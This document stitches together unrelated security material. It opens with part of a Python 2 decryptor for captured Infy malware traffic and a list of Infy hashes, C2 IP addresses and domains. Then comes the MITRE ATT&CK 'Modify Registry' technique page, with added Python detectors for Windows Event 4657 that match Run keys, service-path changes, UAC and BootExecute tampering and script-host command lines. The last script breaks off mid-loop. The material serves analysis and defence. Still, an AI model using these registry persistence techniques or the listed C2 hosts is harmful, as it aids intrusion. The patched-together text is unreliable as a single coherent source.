        translated = SECOND_PHASE[(index - i + offset) % len(SECOND_PHASE)]
        result += translated
    return result


def found_infy_enc_data(line):
    found_infy_str = "show=\"---------- Administration Reporting Service "
    found_infy_index = line.find(found_infy_str)
    if not found_infy_index == -1:
        return True, found_infy_index
    else:
        return False, found_infy_index


def extract_comp_name(line):
    comp = r"\xd\xa-----"
    comp_index = line.find(comp)
    comp_name = line[comp_index + len(comp):]
    comp_name = comp_name[:comp_name.find("-----")]
    print "(((=)))" + comp_name
    return comp_name


def extract_enc_data(line):
    header = r"\xd\xa_____"
    start_index = line.find(header) + len(header)
    line = line[start_index:]
    endindex = line.index("_____\" value=")
    line = line[:endindex]
    return line


def write_enc_infy_data_to_file(dec_line, comp_name, filename):
    file1 = open(filename + "\\" + comp_name + ".txt", 'ab')
    file1.writelines(dec_line)
    file1.close()


def enc_wrapper(enc, comp_name):
    global FULL_KEY
    print FULL_KEY
    FULL_KEY = init_key(comp_name)
    enc_final = ""
    for letter in enc:
        if len(hex(ord(letter))[2:]) == 1:
            enc_final += "0" + hex(ord(letter))[2:]
        elif len(hex(ord(letter))[2:]) == 2:
            enc_final += hex(ord(letter))[2:]
        else:
            print "not good hex length"
            exit()
    enc = enc_final.upper()
    # clean-ups specific to the captured samples
    enc = enc.replace("2E", "21")
    enc = enc.replace("C5DC5A", "")
    enc = enc.replace("D03D00", "")
    enc = enc.replace("0B0E", "2121")
    enc = enc.replace("01", "21")
    enc_len = len(enc)
    enc_rev = ""
    num_list = []
    enc_print = ""
    # walk the buffer from its end, dropping a few control bytes
    for i in range(0, enc_len / 2):
        enc_rev = enc[-2:]
        if not enc_rev == "0B" and not enc_rev == "0E" and not enc_rev == "00" and not enc_rev == "D0":
            enc_print += enc_rev
            num_list.append(enc_rev)
        enc = enc[:-2]
    # the first part is always ok
    dec_str = decrypt(num_list, 0)
    final = sub_1_for_hex(dec_str)
    index = final.find("OK: Sent")
    if index == -1:
        print comp_name + " - did not found OK: Sent !!!!\n\n\n\n"
        # exit()
    decrypt_data = comp_name + " ++==++ " + str(i) + ": " + final + "\n"
    final_start = final[0:500]
    if final_start in UNIQUE_DATA:
        print comp_name + " already have this data"
        return
    UNIQUE_DATA.append(final_start)
    index = final.find("Installed Date:")
    if index == -1:
        # offset 0 did not decrypt cleanly: brute-force the other offsets
        for i in range(1, 61):
            dec_str = decrypt(num_list, i)  # published listing called decrypt3(), which does not exist
            final = sub_1_for_hex(dec_str)
            ## print all 62 options
            index2 = final.find("PROGRAM START:")
            index3 = final.find("Installed Date:")
            if not index2 == -1 or not index3 == -1:
                decrypt_data += str(i) + ": " + final + "\n"
    write_enc_infy_data_to_file(decrypt_data, comp_name, FILE_OUTPUT_NAME)


def read_enc_data_files():
    for root, dir, files in os.walk(PDML_PATH):
        for file in files:
            filename = root + "\\" + file
            if os.path.isfile(filename):
                print filename
                for line in fileinput.input([filename]):
                    line = line.strip()
                    is_found, found_infy_index = found_infy_enc_data(line)
                    if not is_found:
                        continue
                    line = line[found_infy_index:]
                    # get computer name (for use in init_key() later)
                    comp_name = extract_comp_name(line)
                    UNIQUE_COMP.append(comp_name)
                    # get the infy encrypted data
                    line = extract_enc_data(line)
                    # base64 decode enc_data
                    dec_line = line.decode('base64')
                    # append enc_data to file
                    write_enc_infy_data_to_file(dec_line, comp_name, FILE_ENC_OUTPUT_NAME)
                    enc_wrapper(dec_line, comp_name)


try:
    read_enc_data_files()
except:
    print "exception!!!!"
```

Appendix 2 – IoCs

Infy version 31:
f07e85143e057ee565c25db2a9f36491102d4e526ffb02c83e580712ec00eb27

Infy "M" version 8.0:
583349B7A2385A1E8DE682A43351798CA113CBBB80686193ECF9A61E6942786A

IP addresses:
5.9.94.34
138.201.0.134
138.201.47.150
144.76.250.205
138.201.47.158
138.201.47.153

Domains:
us1s2[.]strangled[.]net
uvps1[.]cotbm[.]com
gstat[.]strangled[.]net
secup[.]soon[.]it
p208[.]ige[.]es
lu[.]ige[.]es
updateserver1[.]com
updateserver3[.]com
updatebox4[.]com
bestupdateserver[.]com
bestupdateserver2[.]com
bestbox3[.]com
safehostline[.]com
youripinfo[.]com
bestupser[.]awardspace[.]info
box4035[.]net
box4036[.]net
box4037[.]net
box4038[.]net
box4039[.]net
box4040[.]net
box4041[.]net
box4042[.]net
box4043[.]net
box4044[.]net
box4045[.]net
box4046[.]net
box4047[.]net
box4048[.]net
box4049[.]net
box4050[.]net
box4051[.]net
box4052[.]net
box4053[.]net
box4054[.]net
box4055[.]net
box4056[.]net
box4057[.]net
box4058[.]net
box4059[.]net
box4060[.]net
box4061[.]net
box4062[.]net
box4063[.]net
box4064[.]net
box4065[.]net
box4066[.]net
box4067[.]net
box4068[.]net
box4069[.]net
box4070[.]net
box4071[.]net
box4072[.]net
box4075[.]net
box4078[.]net
box4079[.]net
box4080[.]net
box4081[.]net
box4082[.]net
box4083[.]net
box4084[.]net
box4085[.]net
box4086[.]net
box4087[.]net
box4088[.]net
box4089[.]net
box4090[.]net
Modify Registry - Enterprise | MITRE ATT&CK

Modify Registry

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. [1] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. [2] Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. [3] [4]

The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the Remote Registry service to be running on the target system. [5] Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication.

ID: T1112
Tactic: Defense Evasion
Platform: Windows
Permissions Required: User, Administrator, SYSTEM
Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters, Windows event logs
Defense Bypassed: Host forensic analysis
Contributors: Bartosz Jerzman; Travis Smith, Tripwire; David Lu, Tripwire
Version: 1.0

Mitigations

Restrict Registry Permissions: Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Examples

ADVSTORESHELL: ADVSTORESHELL is capable of setting and deleting Registry values. [14]
APT19: APT19 uses a Port 22 malware variant to modify several Registry keys. [54]
APT32: APT32's backdoor has modified the Windows Registry to store the backdoor's configuration. [61]
APT38: APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys. [56]
BACKSPACE: BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system. [8]
BADCALL: BADCALL modifies the firewall Registry key SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List. [11]
Bankshot: Bankshot writes data into the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj. [45]
Cardinal RAT: Cardinal RAT sets HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load to point to its executable. [37]
Catchamas: Catchamas creates three Registry keys to establish persistence by adding a New Service. [18]
CHOPSTICK: CHOPSTICK may store RC4 encrypted configuration information in the Windows Registry. [41]
DarkComet: DarkComet adds a Registry value for its installation routine to the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA="0" and HKEY_CURRENT_USER\Software\DC3_FEXEC. [34] [35]
Dragonfly 2.0: Dragonfly 2.0 modified the Registry to perform multiple techniques through the use of Reg. [53]
Exaramel: Exaramel adds the configuration to the Registry in XML format. [36]
FELIXROOT: FELIXROOT deletes the Registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open. [38]
FIN8: FIN8 has deleted Registry keys during post-compromise cleanup activities. [59]
Gorgon Group: Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\. [60]
GreyEnergy: GreyEnergy modifies conditions in the Registry and adds keys. [46]
Honeybee: Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process. [57]
HOPLIGHT: HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system. [47]
Hydraq: Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys. [22] [23]
InvisiMole: InvisiMole has a command to create, set, copy, or delete a specified Registry key or value. [24]
KEYMARBLE: KEYMARBLE has a command to create Registry entries for storing data under HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath. [44]
LoJax: LoJax has modified the Registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute' from 'autocheck autochk *' to 'autocheck autoche *'. [52]
Mosquito: Mosquito stores configuration values under the Registry key HKCU\Software\Microsoft[dllname] and modifies Registry keys under HKCR\CLSID...\InprocServer32 with a path to the launcher. [30]
Naid: Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk. [43]
NanoCore: NanoCore has the capability to edit the Registry. [25] [26]
Nerex: Nerex creates a Registry subkey that registers a new service. [32]
njRAT: njRAT can create, delete, or modify a specified Registry key or value. [48] [49]
Patchwork: A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs. [58]
PHOREAL: PHOREAL is capable of manipulating the Registry. [19]
PLAINTEE: PLAINTEE uses reg add to add a Registry Run key for persistence. [12]
PlugX: PlugX has a module to create, delete, or modify Registry keys. [28]
PoisonIvy: PoisonIvy creates a Registry subkey that registers a new system device. [9]
QUADAGENT: QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications. [13]
QuasarRAT: QuasarRAT has a command to edit the Registry on the victim's machine. [6]
Reg: Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface. [1]
Regin: Regin appears to have functionality to modify remote Registry information. [21]
Remcos: Remcos has full control of the Registry, including the ability to modify it. [7]
Rover: Rover has functionality to remove Registry Run key persistence as a cleanup procedure. [20]
RTM: RTM can delete all Registry entries created during its execution. [33]
Shamoon: Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1. [39] [40]
SOUNDBITE: SOUNDBITE is capable of modifying the Registry. [19]
StreamEx: StreamEx has the ability to modify the Registry. [10]
SynAck: SynAck can manipulate Registry keys. [31]
Threat Group-3390: A Threat Group-3390 tool can create a new Registry key under HKEY_CURRENT_USER\Software\Classes\. [55]
TrickBot: TrickBot can modify Registry entries. [27]
Turla: Turla has used the Registry to store encrypted payloads. [62] [63]
TYPEFRAME: TYPEFRAME can install encrypted configuration data under the Registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs. [29]
Ursnif: Ursnif has used Registry modifications as part of its installation routine. [50] [51]
Volgmer: Volgmer stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security. [15] [16]
Zeus Panda: Zeus Panda modifies several Registry keys under HKCU\Software\Microsoft\Internet Explorer\PhishingFilter\ to disable phishing filters. [42]
zwShell: zwShell can modify the Registry. [17]

Detection

Modifications to the Registry are normal and occur throughout typical use of the Windows operating system.
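Because Registry writes are constant background noise, a detection has to key on the specific locations and values the examples above name. The following Python is an added example, not ATT&CK's or any vendor's code: it runs a handful of rules over constructed Windows Security event 4657 ("A registry value was modified") records that are assumed to have already been parsed into fields by a log pipeline, flagging Run/RunOnce autostarts, service ImagePath values outside system directories, LocalAccountTokenFilterPolicy set to 1 (the Shamoon example), a non-default BootExecute (the LoJax example) and NUL-prefixed names (the Reghide-style hidden keys). The key paths, process names and trusted-directory list are constructed assumptions to tune per environment.

```python
import re

# Rules keyed on the locations and values named in the technique's examples.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
SERVICE_KEY_RE = re.compile(
    r"\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Services\\[^\\]+$", re.I)
SESSION_MANAGER_SUFFIX = "\\control\\session manager"
DEFAULT_BOOTEXECUTE = "autocheck autochk *"
# Assumption: directories from which service binaries are expected to run.
TRUSTED_EXE_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _exe_from_image_path(value: str) -> str:
    """Normalise an ImagePath value such as '"%SystemRoot%\\System32\\x.exe" -k net'
    to a lower-case executable path without quotes or arguments."""
    v = value.strip().strip('"').lower().replace("%systemroot%", "c:\\windows")
    idx = v.find(".exe")
    return v[: idx + 4] if idx != -1 else v


def classify(event: dict) -> list:
    """Return alert labels for one parsed 4657-style event. Expected fields:
    ObjectName (key path), ObjectValueName, NewValue, ProcessName."""
    key = event.get("ObjectName", "")
    name = event.get("ObjectValueName", "")
    new = event.get("NewValue", "")
    alerts = []

    # Pseudo-hidden keys: a leading NUL makes Reg.exe and Win32 readers fail.
    if "\x00" in key or "\x00" in name:
        alerts.append("hidden-null-name")

    # Autostart via Run / RunOnce.
    if RUN_KEY_RE.search(key):
        alerts.append("autostart-run-key")

    # Service binary path pointing outside the expected directories.
    if SERVICE_KEY_RE.search(key) and name.lower() == "imagepath":
        if not _exe_from_image_path(new).startswith(TRUSTED_EXE_DIRS):
            alerts.append("service-imagepath-untrusted")

    # UAC remote restrictions disabled, as in the Shamoon example.
    if name.lower() == "localaccounttokenfilterpolicy" and new.strip() == "1":
        alerts.append("uac-remote-restriction-disabled")

    # BootExecute tampering, as in the LoJax example.
    if key.lower().endswith(SESSION_MANAGER_SUFFIX) and name.lower() == "bootexecute":
        if new.strip().lower() != DEFAULT_BOOTEXECUTE:
            alerts.append("bootexecute-tampered")

    return alerts


def scan(events: list) -> list:
    """Run classify() over a batch; returns (index, process, labels) per hit."""
    findings = []
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            findings.append((i, ev.get("ProcessName", ""), labels))
    return findings


# Constructed sample events (not real telemetry), already parsed into fields.
SAMPLE_EVENTS = [
    # benign: Explorer updating a most-recently-used list
    {"ObjectName": r"\REGISTRY\USER\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
     "ObjectValueName": "a", "NewValue": "notepad\\1", "ProcessName": r"C:\Windows\explorer.exe"},
    # benign: a service ImagePath under the system directory
    {"ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Spooler",
     "ObjectValueName": "ImagePath", "NewValue": r"%SystemRoot%\System32\spoolsv.exe",
     "ProcessName": r"C:\Windows\System32\services.exe"},
    # Run key pointing at a user-writable path
    {"ObjectName": r"\REGISTRY\USER\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run",
     "ObjectValueName": "Updater", "NewValue": r"C:\Users\bob\AppData\Roaming\upd.exe",
     "ProcessName": r"C:\Users\bob\AppData\Roaming\upd.exe"},
    # new service whose binary sits in ProgramData
    {"ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\WinHelp32",
     "ObjectValueName": "ImagePath", "NewValue": r"C:\ProgramData\wh32.exe",
     "ProcessName": r"C:\Windows\System32\services.exe"},
    # UAC remote restrictions disabled
    {"ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "ObjectValueName": "LocalAccountTokenFilterPolicy", "NewValue": "1",
     "ProcessName": r"C:\Windows\System32\reg.exe"},
    # BootExecute swapped for a lookalike
    {"ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager",
     "ObjectValueName": "BootExecute", "NewValue": "autocheck autoche *",
     "ProcessName": r"C:\Windows\System32\rundll32.exe"},
    # key name prefixed with a NUL
    {"ObjectName": "\\REGISTRY\\USER\\S-1-5-21-1\\Software\\Classes\\\x00CLSID",
     "ObjectValueName": "", "NewValue": "", "ProcessName": r"C:\Windows\System32\rundll32.exe"},
]

if __name__ == "__main__":
    for idx, proc, labels in scan(SAMPLE_EVENTS):
        print(idx, proc, ", ".join(labels))
```

Event 4657 is only generated for keys that carry an audit SACL, so the rules are only as good as the auditing scope; in particular, the hidden-name rule depends on the SACL covering key creation under the audited parent, and a key created through the native API with a NUL-prefixed name may never be logged at all.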
Consider enabling Registry auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). [64] Note that 4657 is only generated when both the Object Access > Registry audit subcategory is enabled and the key carries a SACL requesting "Set Value" auditing; either one alone produces nothing. Changes to Registry entries that load software on Windows startup and do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, it will likely be followed by a local or remote service start or restart to execute the file. Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect the necessary information for analysis. Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. [2] Inspect and clean up malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns [4] and RegDelNull [65].

References
1. Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.
2. Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.
3. Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.
4. Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.
5. Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.
6. MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
7. Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.
8. FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
9. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
10. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV's Radar. Retrieved February 15, 2017.
11. US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.
12. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
13. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
14. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
15. US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
16. Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.
17. McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: "Night Dragon". Retrieved February 19, 2018.
18. Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018.
19. Carr, N. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
20. Ray, V., Hayashi, K. (2016, February 29). New Malware 'Rover' Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.
21. Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.
22. Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.
23. Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.
24. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
25. The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.
26. Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.
27. Anthony, N., Pascual, C. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.
28. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
29. US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
30. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
31. Ivanov, A., et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.
32. Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018.
33. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
34. TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.
35. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
36. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
37. Grunzweig, J. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
38. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
39. FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.
40. Falcone, R. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
41. FireEye. (2015). APT28: A WINDOW INTO RUSSIA'S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
42. Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.
43. Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018.
44. US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
45. US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
46. Cherepanov, A. (2018, October). GREYENERGY: A successor to BlackEnergy. Retrieved November 15, 2018.
47. US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
48. Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.
49. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
50. Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.
51. Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
52. ESET. (2018, September). LOJAX: First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.
53. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
54. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
55. Pantazopoulos, N., Henry, T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.
56. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
57. Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.
58. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
59. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
60. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
61. Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.
62. Faou, M. and Dumont, R. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.
63. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
64. Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.
65. Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.

Copyright © 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.
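The Detection guidance above asks for 4657 auditing on sensitive keys and for review of autostart, service and policy changes. The following Python is an added example, not part of the ATT&CK page: it parses 4657 records in the XML shape the Security log renders (the EventData field names are the real ones; the records, SID, user and process names in them are constructed for the example) and applies rules drawn from the malware entries above: Run-key and service-path writes, Shamoon's LocalAccountTokenFilterPolicy=1, Poweliks/Kovter-style mshta or javascript: value data, TYPEFRAME/Turla-style encoded blobs parked in the Registry, and value names containing control characters that a NUL-terminated API cannot render. The OperationType codes %%1904 to %%1906 are the ones Windows uses for created, modified and deleted.

```python
"""Triage Windows Security Event 4657 ("A registry value was modified").

Added example, not code from the ATT&CK page. The EventData field names
(ObjectName, ObjectValueName, OperationType, NewValue, ...) are the ones
Windows writes for 4657; the records themselves are constructed below so the
script runs offline.
"""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
OPERATIONS = {"%%1904": "created", "%%1905": "modified", "%%1906": "deleted"}
SCRIPT_HOST = re.compile(r"\b(mshta|powershell|rundll32|regsvr32|wscript|cscript)\b|javascript:", re.I)
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")


def parse_4657(xml_text):
    """Flatten one event record into {field: value}."""
    root = ET.fromstring(xml_text)
    event = {"EventID": root.findtext("e:System/e:EventID", namespaces=NS)}
    for data in root.find("e:EventData", NS):
        event[data.get("Name")] = data.text or ""
    return event


def _as_int(text):
    try:
        return int(text, 0)  # accepts "1" as well as "0x1"
    except (TypeError, ValueError):
        return None


def triage(event):
    """Return (rule, detail) findings for one parsed event; [] when nothing fires."""
    findings = []
    if event.get("EventID") != "4657":
        return findings
    key = event.get("ObjectName", "")
    name = event.get("ObjectValueName", "")
    new = event.get("NewValue", "")
    klow, nlow = key.lower(), name.lower()
    op = OPERATIONS.get(event.get("OperationType", ""), "changed")

    # Autostart: anything written under a Run/RunOnce key deserves a look.
    if klow.endswith(("\\currentversion\\run", "\\currentversion\\runonce")):
        findings.append(("autostart", f"value {name!r} {op} under {key}"))
    # Service binary paths repointed at attacker files (a service restart usually follows).
    if "\\services\\" in klow and nlow in ("imagepath", "servicedll"):
        findings.append(("service-path", f"{name} now points to {new}"))
    # Shamoon: LocalAccountTokenFilterPolicy=1 disables UAC remote restrictions.
    if klow.endswith("\\policies\\system") and nlow == "localaccounttokenfilterpolicy" and _as_int(new) == 1:
        findings.append(("uac-remote-restrictions-disabled", f"{name}={new}"))
    # Poweliks/Kovter: a script host or javascript: URL as value data.
    if SCRIPT_HOST.search(new):
        findings.append(("script-host-in-value", new[:60]))
    # Turla/TYPEFRAME/Volgmer: encoded payload or configuration parked in the Registry.
    if BASE64_BLOB.match(new):
        findings.append(("encoded-payload", f"{len(new)} base64 characters in {name!r}"))
    # Reghide-style names: control characters a NUL-terminated API cannot express.
    if any(ord(c) < 0x20 for c in name):
        findings.append(("win32-unrepresentable-name", repr(name)))
    return findings


def make_event(key, name, new, op="%%1904", user="svc_backup", proc=r"C:\Windows\System32\reg.exe"):
    """Construct a 4657 record in the XML shape the Security log renders (sample data)."""
    fields = {"SubjectUserName": user, "ObjectName": key, "ObjectValueName": name,
              "OperationType": op, "NewValue": new, "ProcessName": proc}
    data = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="Microsoft-Windows-Security-Auditing"/>'
            f"<EventID>4657</EventID></System><EventData>{data}</EventData></Event>")


# Constructed sample records, one per rule plus a benign control (SID is made up).
SID = "S-1-5-21-1111-2222-3333-1001"
SAMPLES = {
    "run-key-exe": make_event(r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
                              "Updater", r"C:\Users\Public\up.exe"),
    "shamoon-uac": make_event(r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
                              "LocalAccountTokenFilterPolicy", "1", op="%%1905"),
    "kovter-mshta": make_event(rf"\REGISTRY\USER\{SID}\Software\Microsoft\Windows\CurrentVersion\Run",
                               "a1b2", "mshta javascript:alert(1)"),
    "encoded-blob": make_event(r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs",
                               "cfg", base64.b64encode(b"MZ" + bytes(400)).decode()),
    "benign": make_event(rf"\REGISTRY\USER\{SID}\Software\Microsoft\Office\16.0\Word\Options",
                         "LastSaveDir", r"C:\Users\alice\Documents", op="%%1905"),
}


def run_samples():
    """Parse every constructed record and return {label: [rule, ...]}."""
    return {label: [rule for rule, _ in triage(parse_4657(xml))] for label, xml in SAMPLES.items()}


if __name__ == "__main__":
    for label, rules in run_samples().items():
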